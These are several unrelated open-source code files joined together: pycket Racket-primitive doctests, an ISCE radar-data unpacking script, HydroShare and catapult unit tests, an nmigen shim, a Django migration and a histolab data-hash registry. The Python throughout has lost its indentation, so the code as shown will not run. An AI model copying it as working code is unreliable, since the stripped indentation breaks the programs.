> (define usp (open-input-string "\u4F60\u597D,\u4E16\u754C"))
> (peek-byte usp)
228
> (peek-char usp)
#\u4F60
> (peek-char usp)
#\u4F60
> (read-char usp)
#\u4F60
> (read-char usp)
#\u597D
> (read-char usp)
#\,
"""
def test_peek_bug(tmpdir):
from pycket.prims.input_output import open_infile
from pycket import values_string
s = "abc\ndef\nghi"
f = tmpdir.join("example.txt")
f.write(s)
w_n = values_string.W_String.fromstr_utf8(str(f))
w_p = open_infile(w_n, "r")
for c in s:
c1 = w_p.peek()
assert c1 == c
c2 = w_p.read(1)
assert c == c
c = w_p.peek()
assert c == ''
c = w_p.read(1)
assert c == ''
w_p.close()
def test_listp(doctest):
"""
> (list? '(1 2))
#t
> (list? (cons 1 (cons 2 '())))
#t
> (list? (cons 1 2))
#f
> (list? 1)
#f
"""
def test_format(doctest):
r"""
> (format "a")
"a"
E (format "a~a")
E (format "a" 1)
> (format "~~~n~%")
"~\n\n"
> (format "abc~adef~aghi" 1 2)
"abc1def2ghi"
"""
def test_procedure_closure_contents_eq(doctest):
r"""
! (define (f x) (lambda () x))
! (define a "abc")
! (define (g x) (lambda () (g x)))
! (set! f (lambda (x) (lambda () x)))
! (set! g (lambda (x) (lambda () (g x))))
> (procedure-closure-contents-eq? (f a) (f a))
#t
> (procedure-closure-contents-eq? (f a) (f "abc"))
#t
> (procedure-closure-contents-eq? (f 1) (f 1))
#t
> (procedure-closure-contents-eq? (f a) (f "c"))
#f
> (procedure-closure-contents-eq? (g a) (g a))
#t
> (procedure-closure-contents-eq? (g a) ((g a)))
#t
> (procedure-closure-contents-eq? (g a) (((g a))))
#t
> (procedure-closure-contents-eq? (g a) (((g "c"))))
#f
"""
def test_list_ref(doctest):
"""
> (list-ref '(1 2 3) 0)
1
> (list-ref '(1 2 3) 1)
2
> (list-ref '(1 2 3) 2)
3
"""
def test_unsafe_undefined(doctest):
"""
! (require '#%unsafe)
! (struct p (x y) #:mutable #:transparent)
> (check-not-unsafe-undefined 1 'a)
1
E (check-not-unsafe-undefined unsafe-undefined 'a)
> (check-not-unsafe-undefined/assign 1 'a)
1
E (check-not-unsafe-undefined/assign unsafe-undefined 'a)
> (chaperone-struct-unsafe-undefined 1)
1
> (let* ([x (p 1 2)]
[y (chaperone-struct-unsafe-undefined x)]
[_ (set-p-y! y 3)]
[z (p-y y)])
z)
3
"""
def test_dynamic_wind(doctest):
"""
> (dynamic-wind (lambda () 1) (lambda () 2) (lambda () 3))
2
"""
def test_dynamic_wind2():
m = run_mod(
"""
#lang pycket
(require racket/control)
(define acc 0)
(define v
(let/cc k
(dynamic-wind
(lambda () (set! acc (+ acc 1)))
(lambda () (set! acc (+ acc 1)) 42)
(lambda () (set! acc (+ acc 1))))))
""")
acc = m.defs[values.W_Symbol.make("acc")]
v = m.defs[values.W_Symbol.make("v")]
assert isinstance(acc, values.W_Cell)
acc = acc.get_val()
assert isinstance(v, values.W_Fixnum) and v.value == 42
assert isinstance(acc, values.W_Fixnum) and acc.value == 3
def test_dynamic_wind3():
m = run_mod(
"""
#lang pycket
(require racket/control)
(define val
(let/ec k0
(let/ec k1
(dynamic-wind
void
(lambda () (k0 'cancel))
(lambda () (k1 'cancel-canceled))))))
""")
val = m.defs[values.W_Symbol.make("val")]
assert val is values.W_Symbol.make("cancel-canceled")
def test_dynamic_wind4():
m = run_mod(
"""
#lang pycket
(require racket/control)
(define val
(let* ([x (make-parameter 0)]
[l null]
[add (lambda (a b)
(set! l (append l (list (cons a b)))))])
(let ([k (parameterize ([x 5])
(dynamic-wind
(lambda () (add 1 (x)))
(lambda () (parameterize ([x 6])
(let ([k+e (let/cc k (cons k void))])
(add 2 (x))
((cdr k+e))
(car k+e))))
(lambda () (add 3 (x)))))])
(parameterize ([x 7])
(let/cc esc
(k (cons void esc)))))
l))
(define equal (equal? val '((1 . 5) (2 . 6) (3 . 5) (1 . 5) (2 . 6) (3 . 5))))
""")
val = m.defs[values.W_Symbol.make("val")]
equal = m.defs[values.W_Symbol.make("equal")]
assert equal is values.w_true
def test_bytes_conversions():
m = run_mod(
"""
#lang pycket
(define a (real->floating-point-bytes 1 8 #f))
(define b (integer-bytes->integer a #f))
""")
a = values.W_Symbol.make("a")
b = values.W_Symbol.make("b")
vb = m.defs[b]
assert isinstance(vb, values.W_Fixnum) and vb.value == 4607182418800017408
def test_build_path(doctest):
"""
> (path->string (build-path "/usr/bin" "bash"))
"/usr/bin/bash"
> (path->string (build-path "/usr" "bin" 'up "bash"))
"/usr/bin/../bash"
> (path->string (build-path "/usr" "bin" 'same "bash"))
"/usr/bin/./bash"
> (path->string (build-path "/"))
"/"
> (path->string (build-path "/" "etc"))
"/etc"
"""
def test_path_to_complete_path():
m = run_mod(
"""
#lang pycket
(define p (path->complete-path "test.rkt"))
""")
p = m.defs[values.W_Symbol.make("p")]
cwd = os.getcwd()
assert isinstance(p, values.W_Path)
full = cwd + "/" + "test.rkt"
assert full == p.path
def test_explode_path(doctest):
# we use kernel's map to save loading
"""
! (require '#%kernel)
! (define-values (unpath) (lambda (p) (if (path? p) (path->string p) p)))
> (map path->string (explode-path "/home/spenser/src/pycket"))
'("/" "home" "spenser" "src" "pycket")
> (map unpath (explode-path "/home/spenser/src/pycket/.././."))
'("/" "home" "spenser" "src" "pycket" up same same)
> (map unpath (explode-path "home/spenser/src/pycket/.././."))
'("home" "spenser" "src" "pycket" up same same)
> (map unpath (explode-path "a//b"))
'("a" "b")
> (map unpath (explode-path "a//"))
'("a")
"""
assert doctest
def test_file_size(doctest):
"""
> (file-size "./pycket/test/sample_file.txt")
256
"""
assert doctest
def test_andmap(doctest):
"""
! (require (only-in '#%kernel andmap))
> (andmap even? '())
#t
> (andmap even? '(1))
#f
> (andmap even? '(2))
#t
> (andmap even? '(1 2 3 4 5 6 7 8 9))
#f
> (andmap even? '(2 4 6 8))
#t
> (andmap odd? '())
#t
> (andmap odd? '(1))
#t
> (andmap odd? '(2))
#f
> (andmap odd? '(1 2 3 4 5 6 7 8 9))
#f
> (andmap odd? '(2 4 6 8))
#f
"""
def test_ormap(doctest):
"""
! (require (only-in '#%kernel ormap))
> (ormap even? '())
#f
> (ormap even? '(1))
#f
> (ormap even? '(2))
#t
> (ormap even? '(1 2 3 4 5 6 7 8 9))
#t
> (ormap even? '(2 4 6 8))
#t
> (ormap odd? '())
#f
> (ormap odd? '(1))
#t
> (ormap odd? '(2))
#f
> (ormap odd? '(1 2 3 4 5 6 7 8 9))
#t
> (ormap odd? '(2 4 6 8))
#f
"""
@pytest.mark.skip(reason="we only do correlated")
def test_syntax_to_datum(doctest):
"""
> (syntax->datum #'a)
'a
> (syntax->datum #'(x . y))
'(x . y)
> (syntax->datum #'#(1 2 (+ 3 4)))
'#(1 2 (+ 3 4))
> (syntax->datum #'#&"hello world")
'#&"hello world"
;;;;; XXX: Ordering problem?
;> (syntax->datum #'#hash((imperial . "yellow") (festival . "green")))
;'#hash((festival . "green") (imperial . "yellow"))
> (syntax->datum #'#(point 3 4))
'#(point 3 4)
> (syntax->datum #'3)
3
> (syntax->datum #'"three")
"three"
> (syntax->datum #'#t)
#t
"""
@skip
def test_syntax_e(doctest):
"""
> (syntax-e #'a)
'a
> (let ((s (syntax-e #'(x . y))))
(and (pair? s) (syntax? (car s)) (syntax? (cdr s))))
;'(#<syntax:11:0 x> . #<syntax:11:0 y>)
#t
> (let ((s (syntax-e #'#(1 2 (+ 3 4)))))
(and (list? s) (syntax? (list-ref s 1))))
;'#(#<syntax:12:0 1> #<syntax:12:0 2> #<syntax:12:0 (+ 3 4)>)
#t
> (let ((s (syntax-e #'#&"hello world")))
(and (box? s) (syntax? (unbox s))))
;'#&#<syntax:13:0 "hello world">
#t
;;;;; XXX: Ordering problem?
;> (syntax-e #'#hash((imperial . "yellow") (festival . "green")))
;'#hash((festival . #<syntax:14:0 "green">) (imperial . #<syntax:14:0 "yellow">))
> (let ((s (syntax-e #'#(point 3 4))))
(and (vector? s) (syntax? (vector-ref s 1))))
;'#(#<syntax:15:0 point> #<syntax:15:0 3> #<syntax:15:0 4>)
#t
> (syntax-e #'3)
3
> (syntax-e #'"three")
"three"
> (syntax-e #'#t)
#t
"""
def test_relative_path(doctest):
"""
> (relative-path? "/home/spenser")
#f
> (relative-path? "~/bin/racket")
#t
> (relative-path? "./../bin/racket")
#t
> (relative-path? (string->path "/home/spenser"))
#f
> (relative-path? (string->path "~/bin/racket"))
#t
> (relative-path? (string->path "./../bin/racket"))
#t
"""
def test_continuation_prompt_functions(doctest):
u"""
! (define tag (make-continuation-prompt-tag))
! (define (escape v) (abort-current-continuation tag (lambda () v)))
> (call-with-continuation-prompt (λ () (+ 1 (+ 1 (+ 1 (+ 1 (+ 1 (+ 1 (escape 0)))))))) tag)
0
> (+ 1 (call-with-continuation-prompt (lambda () (+ 1 (+ 1 (+ 1 (+ 1 (+ 1 (+ 1 (escape 0)))))))) tag))
1
> (call-with-continuation-prompt (λ () (+ 1 (+ 1 (+ 1 (+ 1 (+ 1 (+ 1 (escape 0)))))))) tag (λ (x) (+ 10 (x))))
10
> (+ 1 (call-with-continuation-prompt (lambda () (+ 1 (+ 1 (+ 1 (+ 1 (+ 1 (+ 1 (escape 0)))))))) tag (λ (x) (+ (x) 10))))
11
"""
def test_continuation_prompt_available(doctest):
u"""
! (define tag (make-continuation-prompt-tag))
! (define tag2 (make-continuation-prompt-tag))
> (call-with-continuation-prompt (λ () (continuation-prompt-available? tag)) tag)
#t
> (call-with-continuation-prompt (λ () (continuation-prompt-available? tag)) tag2)
#f
"""
def test_raise_exception(doctest):
u"""
! (require racket/base)
! (define-struct (my-exception exn:fail:user) ())
> (with-handlers ([number? (lambda (n) (+ n 5))]) (raise 18 #t))
23
> (with-handlers ([my-exception? (lambda (e) #f)]) (+ 5 (raise (make-my-exception "failed" (current-continuation-marks)))))
#f
> (with-handlers ([number? (λ (n) (+ n 5))]) (with-handlers ([string? (λ (n) (string-append n " caught ya"))]) (raise 8)))
13
"""
def test_ctype_basetype(doctest):
u"""
! (require '#%foreign)
> (ctype-basetype #f)
#f
> (ctype-basetype _int8)
'int8
> (ctype-basetype _uint32)
'uint32
> (ctype-basetype (make-ctype _int8 #f #f))
'int8
> (ctype-basetype (make-ctype _int8 (λ (x) x) #f))
_int8
"""
def test_ctype_basetype(doctest):
u"""
! (require '#%foreign)
> (equal? (ctype-sizeof _int8) (ctype-sizeof (make-ctype _int8 #f #f)))
#t
"""
def test_procedure_result_arity(doctest):
"""
! (define-struct node (x y z))
> (procedure-result-arity car)
1
> (procedure-result-arity cdr)
1
> (procedure-result-arity node-x)
1
"""
def test_string_to_keyword(doctest):
"""
> (eq? (string->keyword "hello") (values '#:hello))
#t
> (eq? (string->keyword "muffin button") (values '#:|muffin button|))
#t
"""
def test_bytes_to_path_element(doctest):
"""
> (path->string (bytes->path-element (string->bytes/locale "spenser")))
"spenser"
"""
def test_bytes_to_immutable_bytes(doctest):
"""
> (immutable? (bytes->immutable-bytes (bytes 1 2 3)))
#t
> (equal? (bytes->immutable-bytes (bytes 1 2 3)) (bytes 1 2 3))
#t
"""
def test_bytes_to_list(doctest):
"""
> (bytes->list #"Apple")
'(65 112 112 108 101)
"""
def test_split_path(doctest):
"""
! (define-values (base1 name1 must-be-dir1) (split-path "abc/def"))
! (define-values (base2 name2 must-be-dir2) (split-path "./abc/def"))
! (define-values (base3 name3 must-be-dir3) (split-path ".."))
! (define-values (base4 name4 must-be-dir4) (split-path "."))
! (define-values (base5 name5 must-be-dir5) (split-path "foo"))
! (define-values (base6 name6 must-be-dir6) (split-path "bcd/"))
! (define-values (base7 name7 must-be-dir7) (split-path "./"))
! (define-values (base8 name8 must-be-dir8) (split-path "/etc"))
! (define-values (base9 name9 must-be-dir9) (split-path "/"))
! (define-values (base10 name10 must-be-dir10) (split-path "/etc/"))
> base1
(string->path "abc/")
> name1
(string->path "def")
> must-be-dir1
#f
> base2
(string->path "./abc/")
> name2
(string->path "def")
> must-be-dir2
#f
> base3
'relative
> name3
'up
> must-be-dir3
#t
> base4
'relative
> name4
'same
> must-be-dir4
#t
> base5
'relative
> name5
(string->path "foo")
> must-be-dir5
#f
> base6
'relative
> name6
(string->path "bcd")
> must-be-dir6
#t
> base7
'relative
> name7
'same
> must-be-dir7
#t
> base8
(string->path "/")
> name8
(string->path "etc")
> must-be-dir8
#f
> base9
#f
> name9
(string->path "/")
> must-be-dir9
#t
> base10
(string->path "/")
> name10
(string->path "etc")
> must-be-dir10
#t
> (let-values ([(a b c) (split-path (build-path "b" (quote up)))])
(list (path->string a) b c))
'("b/" up #t)
"""
def test_fail_user_simple(doctest):
"""
E (raise-user-error "foo")
"""
def test_integer_to_integer_bytes(doctest):
r"""
> (integer->integer-bytes 0 2 #t)
#"\0\0"
> (integer->integer-bytes -1 2 #t)
#"\377\377"
> (integer->integer-bytes 65535 2 #f)
#"\377\377"
> (integer->integer-bytes 0 2 #t #t)
#"\0\0"
> (integer->integer-bytes -1 2 #t #t)
#"\377\377"
> (integer->integer-bytes -256 2 #t #t)
#"\377\0"
> (integer->integer-bytes -255 2 #t #t)
#"\377\1"
> (integer->integer-bytes 511 2 #t #t)
#"\1\377"
> (integer->integer-bytes 513 2 #f #f)
#"\1\2"
> (integer->integer-bytes 0 2 #t #f)
#"\0\0"
> (integer->integer-bytes -1 2 #t #f)
#"\377\377"
> (integer->integer-bytes 65535 2 #f #f)
#"\377\377"
> (integer->integer-bytes 511 2 #t #f)
#"\377\1"
> (integer->integer-bytes -255 2 #t #f)
#"\1\377"
> (integer->integer-bytes 258 2 #f #t)
#"\1\2"
> (integer->integer-bytes 0 4 #t)
#"\0\0\0\0"
> (integer->integer-bytes -1 4 #t)
#"\377\377\377\377"
> (integer->integer-bytes 4294967295 4 #f)
#"\377\377\377\377"
> (integer->integer-bytes 0 4 #t #t)
#"\0\0\0\0"
> (integer->integer-bytes -1 4 #t #t)
#"\377\377\377\377"
> (integer->integer-bytes 4294967295 4 #f #t)
#"\377\377\377\377"
> (integer->integer-bytes -16777216 4 #t #t)
#"\377\0\0\0"
> (integer->integer-bytes 255 4 #t #t)
#"\0\0\0\377"
> (integer->integer-bytes 1835103348 4 #t #t)
#"matt"
> (integer->integer-bytes 1953784173 4 #t #f)
#"matt"
> (integer->integer-bytes 0 8 #t #t)
#"\0\0\0\0\0\0\0\0"
> (integer->integer-bytes -1 8 #t #f)
#"\377\377\377\377\377\377\377\377"
> (integer->integer-bytes 4294967295 8 #t #f)
#"\377\377\377\377\0\0\0\0"
> (integer->integer-bytes -4294967296 8 #t #f)
#"\0\0\0\0\377\377\377\377"
> (integer->integer-bytes 8589934591 8 #t #f)
#"\377\377\377\377\1\0\0\0"
> (integer->integer-bytes -4294967295 8 #t #f)
#"\1\0\0\0\377\377\377\377"
> (integer->integer-bytes 0 8 #t #f)
#"\0\0\0\0\0\0\0\0"
> (integer->integer-bytes -1 8 #t #f)
#"\377\377\377\377\377\377\377\377"
> (integer->integer-bytes -4294967296 8 #t #t)
#"\377\377\377\377\0\0\0\0"
> (integer->integer-bytes 4294967295 8 #t #t)
#"\0\0\0\0\377\377\377\377"
> (integer->integer-bytes -4294967295 8 #t #t)
#"\377\377\377\377\0\0\0\1"
> (integer->integer-bytes 8589934591 8 #t #t)
#"\0\0\0\1\377\377\377\377"
"""
# Tests for bigint
# > (integer->integer-bytes 18446744073709551615 8 #f #f)
# #"\377\377\377\377\377\377\377\377"
# > (integer->integer-bytes 18446744073709551615 8 #f #f)
# #"\377\377\377\377\377\377\377\377"
def test_integer_bytes_to_integer(doctest):
r"""
> (integer-bytes->integer #"\0\0" #t)
0
> (integer-bytes->integer #"\377\377" #t)
-1
> (integer-bytes->integer #"\377\377" #f)
65535
> (integer-bytes->integer #"\0\0" #t #t)
0
> (integer-bytes->integer #"\377\377" #t #t)
-1
> (integer-bytes->integer #"\377\377" #f #t)
65535
> (integer-bytes->integer #"\377\0" #t #t)
-256
> (integer-bytes->integer #"\377\1" #t #t)
-255
> (integer-bytes->integer #"\1\377" #t #t)
511
> (integer-bytes->integer #"\1\2" #f #f)
513
> (integer-bytes->integer #"\0\0" #t #f)
0
> (integer-bytes->integer #"\377\377" #t #f)
-1
> (integer-bytes->integer #"\377\377" #f #f)
65535
> (integer-bytes->integer #"\377\1" #t #f)
511
> (integer-bytes->integer #"\1\377" #t #f)
-255
> (integer-bytes->integer #"\1\2" #f #t)
258
> (integer-bytes->integer #"\0\0\0\0" #t)
0
> (integer-bytes->integer #"\377\377\377\377" #t)
-1
> (integer-bytes->integer #"\377\377\377\377" #f)
4294967295
> (integer-bytes->integer #"\0\0\0\0" #t #t)
0
> (integer-bytes->integer #"\377\377\377\377" #t #t)
-1
> (integer-bytes->integer #"\377\377\377\377" #f #t)
4294967295
> (integer-bytes->integer #"\377\0\0\0" #t #t)
-16777216
> (integer-bytes->integer #"\0\0\0\377" #t #t)
255
> (integer-bytes->integer #"\0\0\0\0" #t #f)
0
> (integer-bytes->integer #"\377\377\377\377" #t #f)
-1
> (integer-bytes->integer #"\377\377\377\377" #f #f)
4294967295
> (integer-bytes->integer #"\377\0\0\1" #t #f)
16777471
> (integer-bytes->integer #"\0\0\0\377" #t #f)
-16777216
> (integer-bytes->integer #"\1\0\0\377" #t #f)
-16777215
> (integer-bytes->integer #"matt" #t #t)
1835103348
> (integer-bytes->integer #"matt" #t #f)
1953784173
> (integer-bytes->integer #"\0\0\0\0\0\0\0\0" #t #t)
0
> (integer-bytes->integer #"\377\377\377\377\377\377\377\377" #t #f)
-1
> (integer-bytes->integer #"\377\377\377\377\377\377\377\377" #f #f)
18446744073709551615
> (integer-bytes->integer #"\377\377\377\377\0\0\0\0" #t #f)
4294967295
> (integer-bytes->integer #"\0\0\0\0\377\377\377\377" #t #f)
-4294967296
> (integer-bytes->integer #"\377\377\377\377\1\0\0\0" #t #f)
8589934591
> (integer-bytes->integer #"\1\0\0\0\377\377\377\377" #t #f)
-4294967295
> (integer-bytes->integer #"\0\0\0\0\0\0\0\0" #t #f)
0
> (integer-bytes->integer #"\377\377\377\377\377\377\377\377" #t #f)
-1
> (integer-bytes->integer #"\377\377\377\377\377\377\377\377" #f #f)
18446744073709551615
> (integer-bytes->integer #"\377\377\377\377\0\0\0\0" #t #t)
-4294967296
> (integer-bytes->integer #"\0\0\0\0\377\377\377\377" #t #t)
4294967295
> (integer-bytes->integer #"\377\377\377\377\0\0\0\1" #t #t)
-4294967295
> (integer-bytes->integer #"\0\0\0\1\377\377\377\377" #t #t)
8589934591
"""
def test_logger_operations(doctest):
"""
> (logger-name (make-logger 'example))
'example
"""
def test_path_less_than(doctest):
"""
> (path<? (string->path "a") (string->path "b"))
#t
> (path<? (string->path "") (string->path ""))
#f
> (path<? (string->path "a") (string->path ""))
#f
> (path<? (string->path "") (string->path "a"))
#t
> (path<? (string->path "/home/spenser") (string->path "/home"))
#f
> (path<? (string->path "/home") (string->path "/home/spenser"))
#t
"""
def test_string_to_bytes_latin1(doctest):
u"""
! (define b (bytes->string/latin-1 (bytes 254 211 209 165)))
> (string->bytes/latin-1 b)
#"\376\323\321\245"
> (bytes->string/latin-1 (string->bytes/latin-1 b))
"þÓÑ¥"
"""
def test_current_seconds(doctest):
"""
> (exact-integer? (current-seconds))
#t
"""
def test_true_object(doctest):
"""
! (require '#%kernel)
> (true-object? #t)
#t
> (true-object? #f)
#f
> (true-object? 3)
#f
"""
def test_char_foldcase(doctest):
ur"""
> (char-foldcase #\A)
#\a
> (char-foldcase #\Σ)
#\σ
> (char-foldcase #\ς)
#\σ
> (char-foldcase #\space)
#\space
"""
def test_procedure_specialize(doctest):
"""
! (define f (let ([g 5]) (lambda (x) (+ g x))))
> (f 1)
6
> ((procedure-specialize f) 1)
6
"""
def test_symbol_less_than(doctest):
"""
> (symbol<? 'a 'b)
#t
> (symbol<? 'a 'a)
#f
> (symbol<? 'b 'a)
#f
"""
|
contrib/stack/stripmapStack/unpackFrame_ROIPAC_raw.py | vincentschut/isce2 | 1,133 | 11096104 | <reponame>vincentschut/isce2
#!/usr/bin/env python3
import isce
from isceobj.Sensor import createSensor
import shelve
import argparse
import glob
from isceobj.Util import Poly1D
from isceobj.Planet.AstronomicalHandbook import Const
import os
from mroipac.dopiq.DopIQ import DopIQ
import copy
def cmdLineParse():
'''
Command line parser.
'''
parser = argparse.ArgumentParser(description='Unpack raw data and store metadata in pickle file.')
parser.add_argument('-i','--input', dest='rawfile', type=str,
required=True, help='Input ROI_PAC file')
parser.add_argument('-r','--hdr', dest='hdrfile', type=str,
required=True, help='Input hdr (orbit) file')
parser.add_argument('-o', '--output', dest='slcdir', type=str,
required=True, help='Output data directory')
return parser.parse_args()
def unpack(rawname, hdrname, slcname):
'''
Unpack raw to binary file.
'''
if not os.path.isdir(slcname):
os.mkdir(slcname)
date = os.path.basename(slcname)
obj = createSensor('ROI_PAC')
obj.configure()
obj._rawFile = rawname
obj._hdrFile = hdrname
obj.output = os.path.join(slcname, date+'.raw')
print(obj._rawFile)
print(obj._hdrFile)
print(obj.output)
obj.extractImage()
obj.frame.getImage().renderHdr()
#####Estimate doppler
dop = DopIQ()
dop.configure()
img = copy.deepcopy(obj.frame.getImage())
img.setAccessMode('READ')
dop.wireInputPort('frame', object=obj.frame)
dop.wireInputPort('instrument', object=obj.frame.instrument)
dop.wireInputPort('image', object=img)
dop.calculateDoppler()
dop.fitDoppler()
fit = dop.quadratic
coef = [fit['a'], fit['b'], fit['c']]
print(coef)
obj.frame._dopplerVsPixel = [x*obj.frame.PRF for x in coef]
pickName = os.path.join(slcname, 'raw')
with shelve.open(pickName) as db:
db['frame'] = obj.frame
if __name__ == '__main__':
'''
Main driver.
'''
inps = cmdLineParse()
if inps.slcdir.endswith('/'):
inps.slcdir = inps.slcdir[:-1]
unpack(inps.rawfile, inps.hdrfile, inps.slcdir)
|
hs_core/tests/api/native/test_set_public.py | hydroshare/hydroshare | 178 | 11096115 | <reponame>hydroshare/hydroshare
import os
import tempfile
import shutil
from unittest import TestCase, skip
from django.contrib.auth.models import Group, User
from django.core.exceptions import ValidationError
from hs_core.hydroshare import resource
from hs_core.models import GenericResource
from hs_core.testing import MockIRODSTestCaseMixin
from hs_core import hydroshare
class TestCreateResource(MockIRODSTestCaseMixin, TestCase):
def setUp(self):
super(TestCreateResource, self).setUp()
self.tmp_dir = tempfile.mkdtemp()
self.hs_group, _ = Group.objects.get_or_create(name='Hydroshare Author')
# create a user
self.user = hydroshare.create_account(
'<EMAIL>',
username='mytestuser',
first_name='some_first_name',
last_name='some_last_name',
superuser=False,
groups=[self.hs_group]
)
# create files
file_one = os.path.join(self.tmp_dir, "test1.txt")
file_one_write = open(file_one, "w")
file_one_write.write("Putting something inside")
file_one_write.close()
# open files for read and upload
self.file_one = open(file_one, "rb")
self.res = resource.create_resource(
'GenericResource',
self.user,
'My Test Resource',
files=(self.file_one,)
)
def tearDown(self):
super(TestCreateResource, self).tearDown()
self.file_one.close()
shutil.rmtree(self.tmp_dir)
self.res.delete()
self.user.uaccess.delete()
self.user.delete()
self.hs_group.delete()
User.objects.all().delete()
Group.objects.all().delete()
GenericResource.objects.all().delete()
def test_resource_setAVU_and_getAVU(self):
""" test that setAVU and getAVU work predictably """
self.res.setAVU("foo", "bar")
self.assertEqual(self.res.getAVU("foo"), "bar")
self.res.setAVU("foo", "cat")
self.assertEqual(self.res.getAVU("foo"), "cat")
@skip("TODO: was not running before python3 upgrade")
def test_set_public_and_set_discoverable(self):
""" test that resource.set_public and resource.set_discoverable work properly. """
# default resource was constructed to be publishable
self.assertTrue(self.res.can_be_public_or_discoverable)
self.assertFalse(self.res.raccess.discoverable)
self.assertFalse(self.res.raccess.public)
self.assertEqual(self.res.getAVU('isPublic'), 'false')
self.res.set_public(False)
self.assertFalse(self.res.raccess.discoverable)
self.assertFalse(self.res.raccess.public)
self.assertEqual(self.res.getAVU('isPublic'), 'false')
self.res.set_discoverable(True)
self.assertTrue(self.res.raccess.discoverable)
self.assertFalse(self.res.raccess.public)
self.assertEqual(self.res.getAVU('isPublic'), 'false')
self.res.set_discoverable(False)
self.assertFalse(self.res.raccess.discoverable)
self.assertFalse(self.res.raccess.public)
self.res.set_public(True)
self.assertTrue(self.res.raccess.discoverable)
self.assertTrue(self.res.raccess.public)
self.assertEqual(self.res.getAVU('isPublic'), 'true')
self.res.set_discoverable(False)
self.assertFalse(self.res.raccess.discoverable)
self.assertFalse(self.res.raccess.public)
self.assertEqual(self.res.getAVU('isPublic'), 'false')
# now try some things that won't work
# first make the resource unacceptable to be discoverable
self.res.metadata.title.value = ''
self.res.metadata.title.save()
self.assertFalse(self.res.can_be_public_or_discoverable)
with self.assertRaises(ValidationError):
self.res.set_public(True)
self.assertFalse(self.res.raccess.discoverable)
self.assertFalse(self.res.raccess.public)
self.assertEqual(self.res.getAVU('isPublic'), 'false')
with self.assertRaises(ValidationError):
self.res.set_discoverable(True)
@skip("TODO: was not running before python3 upgrade")
def test_update_public_and_discoverable(self):
""" test that resource.update_public_and_discoverable works properly. """
self.assertTrue(self.res.can_be_public_or_discoverable)
self.res.update_public_and_discoverable()
self.assertFalse(self.res.raccess.discoverable)
self.assertFalse(self.res.raccess.public)
self.assertEqual(self.res.getAVU('isPublic'), 'false')
# intentionally and greviously violate constraints
self.res.raccess.discoverable = True
self.res.raccess.public = True
self.res.raccess.save()
self.res.setAVU('isPublic', True)
# There's a problem now
self.assertFalse(self.res.can_be_public_or_discoverable)
self.assertEqual(self.res.getAVU('isPublic'), 'true')
# update should correct the problem
self.res.update_public_and_discoverable()
self.assertFalse(self.res.raccess.discoverable)
self.assertFalse(self.res.raccess.public)
self.assertEqual(self.res.getAVU('isPublic'), 'false')
|
tracing/tracing/metrics/discover_unittest.py | tingshao/catapult | 2,151 | 11096130 | # Copyright (c) 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from tracing.metrics import discover
class MetricsDiscoverUnittest(unittest.TestCase):
def testMetricsDiscoverEmpty(self):
self.assertFalse(discover.DiscoverMetrics([]))
def testMetricsDiscoverNonEmpty(self):
self.assertEquals(['sampleMetric'], discover.DiscoverMetrics(
['/tracing/metrics/sample_metric.html']))
def testMetricsDiscoverMultipleMetrics(self):
self.assertGreater(
len(discover.DiscoverMetrics(
['/tracing/metrics/all_metrics.html'])), 1)
|
nmigen/compat/sim/__init__.py | psumesh/nmigen | 528 | 11096150 | from amaranth.compat.sim import *
from amaranth.compat.sim import __all__
import warnings
warnings.warn("instead of nmigen.compat.sim, use amaranth.compat.sim",
DeprecationWarning, stacklevel=2)
|
src/richie/apps/courses/migrations/0012_add_translation_model_for_licence_fields.py | leduong/richie | 174 | 11096151 | # Generated by Django 2.2.9 on 2020-01-02 15:07
import django.db.models.deletion
from django.db import migrations, models
import parler.models
import richie.apps.core.fields.multiselect
class Migration(migrations.Migration):
dependencies = [("courses", "0011_deprecate_untranslated_licence_fields")]
operations = [
migrations.CreateModel(
name="LicenceTranslation",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"language_code",
models.CharField(
db_index=True, max_length=15, verbose_name="Language"
),
),
("name", models.CharField(max_length=200, verbose_name="name")),
("content", models.TextField(default="", verbose_name="content")),
(
"master",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="translations",
to="courses.Licence",
),
),
],
options={
"verbose_name": "Licence translation",
"db_table": "richie_licence_translation",
"unique_together": {("language_code", "master")},
},
bases=(parler.models.TranslatedFieldsModelMixin, models.Model),
)
]
|
histolab/data/_registry.py | Toughee/histolab | 149 | 11096172 | <reponame>Toughee/histolab
# flake8: noqa
# in legacy datasets we need to put our sample data within the data dir
legacy_datasets = ["cmu_small_region.svs"]
# Registry of datafiles that can be downloaded along with their SHA256 hashes
# To generate the SHA256 hash, use the command
# openssl sha256 filename
registry = {
"histolab/broken.svs": "b1325916876afa17ad5e02d2e7298ee883e758ed25369470d85bc0990e928e11",
"histolab/kidney.png": "5c6dc1b9ae10a2865302d9c8eda360362ec47732cb3e9766c38ed90cb9f4c371",
"data/cmu_small_region.svs": "ed92d5a9f2e86df67640d6f92ce3e231419ce127131697fbbce42ad5e002c8a7",
"aperio/JP2K-33003-1.svs": "6205ccf75a8fa6c32df7c5c04b7377398971a490fb6b320d50d91f7ba6a0e6fd",
"aperio/JP2K-33003-2.svs": "1a13cef86b55b51127cebd94a1f6069f7de494c98e3e708640d1ce7181d9e3fd",
"tcga/breast/9c960533-2e58-4e54-97b2-8454dfb4b8c8": "03f542afa2d70224d594b2cca33b99977a5c0e41b1a8d03471ab3cf62ea3c4b3",
"tcga/breast/da36d3aa-9b19-492a-af4f-cc028a926d96": "2172cca68a8b7722d281174a74c4f112d0f52fc71710d7d605f401731c783fc9",
"tcga/breast/f8b4cee6-9149-45b4-ae53-82b0547e1e34": "55c694262c4d44b342e08eb3ef2082eeb9e9deeb3cb445e4776419bb9fa7dc21",
"tcga/breast/31e248bf-ee24-4d18-bccb-47046fccb461": "95163831d9076bb5e5b21790933dee9535a3607ba35bd6ae425374a45ecb1ba6",
"tcga/prostate/6b725022-f1d5-4672-8c6c-de8140345210": "305c80e28227b25fdd0cc24726da4cf038380b4326e25c6518ffe23051a25ac0",
"tcga/ovarian/b777ec99-2811-4aa4-9568-13f68e380c86": "f8e5059a0c9f8c026cfb2613cddef6562f8cdbd5954580282e2afa41d2f86a8c",
"9798433/?format=tif": "7db49ff9fc3f6022ae334cf019e94ef4450f7d4cf0d71783e0f6ea82965d3a52",
"9798554/?format=tif": "8a4318ac713b4cf50c3314760da41ab7653e10e90531ecd0c787f1386857a4ef",
}
